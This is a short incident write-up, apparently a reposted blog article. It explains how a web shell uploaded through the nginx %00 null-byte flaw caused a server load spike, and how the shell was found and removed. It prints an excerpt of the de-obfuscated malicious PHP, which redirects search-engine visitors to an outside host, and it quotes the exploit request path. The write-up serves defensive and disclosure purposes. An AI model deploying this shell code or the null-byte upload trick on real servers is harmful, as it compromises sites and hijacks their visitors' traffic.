BestHub
Sign in
Information Security 7 min read

How a Nginx Null‑Byte Upload Vulnerability Fueled a Server Load Spike

A sudden 50% server load increase was traced to a malicious PHP file uploaded via an Nginx %00 null‑byte vulnerability, revealing how the exploit works, how it was detected, and steps to prevent future attacks.

ITPUB
ITPUB
ITPUB
How a Nginx Null‑Byte Upload Vulnerability Fueled a Server Load Spike

During routine monitoring with Cacti, the author noticed two web servers whose CPU load spiked by about 50%. Initial checks showed php‑fpm processes briefly consuming 100% CPU, prompting a deeper investigation.

Investigation Steps

Using top, strace, and lsof, the author traced high‑CPU processes to files under the BBS root directory. A custom script that hashes files detected an unexpected forums.php file, which did not exist before.

Malicious File Analysis

The discovered forums.php contained heavily obfuscated PHP code that redirected traffic based on the HTTP referrer and fetched additional payloads from http://localtemp.665203.com/server.php. After de‑obfuscation, the code was identified as a web‑shell used to serve promotional links.

error_reporting(E_ERROR);
$domain=$_SERVER['SERVER_NAME'];
$dddd = $_SERVER['PHP_SELF'];
$qqqq=$_SERVER["QUERY_STRING"];
$filename = end(explode('/',$dddd));
if(stristr($_SERVER['HTTP_REFERER'],'baidu.com/')) {
    Header("Location: http://jump.1310.net/jump.php?".$_SERVER['HTTP_REFERER']);
} else if(stristr($_SERVER['HTTP_REFERER'],'google.com.hk/search?')) {
    Header("Location: http://jump.1310.net/jump.php?".$_SERVER['HTTP_REFERER']);
} /* ... */
?>

Removing the file immediately reduced the server load, confirming it as the cause.

Root Cause: Nginx %00 Null‑Byte Upload Vulnerability

Log analysis showed the attacker uploaded a JPEG avatar containing PHP code and exploited the Nginx %00 null‑byte vulnerability (e.g., POST /ucenter/data/tmp/upload545562.jpg%00.php) to write a PHP script into the forum root. Versions vulnerable include nginx 0.5.*, 0.6.*, 0.7 ≤ 0.7.65, and 0.8 ≤ 0.8.37. Upgrading Nginx to ≥ 1.0.12 resolved the issue.

Lessons Learned

Stay informed about security advisories; the Nginx %00 bug was disclosed in July 2011.

Regularly verify file integrity with MD5 or similar hashes to detect unauthorized changes quickly.

Restrict write permissions on web‑root directories to limit the impact of file‑upload attacks.

Implement continuous monitoring and set alerts for abnormal CPU usage to enable rapid response.

By applying these measures, the risk of similar web‑shell infections can be significantly reduced.

NginxSecurity Monitoringserver loadweb shellnull-byte vulnerability
ITPUB
Written by

ITPUB

Official ITPUB account sharing technical insights, community news, and exciting events.

0 followers
Reader feedback

How this landed with the community

Sign in to like

Rate this article

Was this worth your time?

Sign in to rate
Discussion

0 Comments

Thoughtful readers leave field notes, pushback, and hard-won operational detail here.

Sign in to comment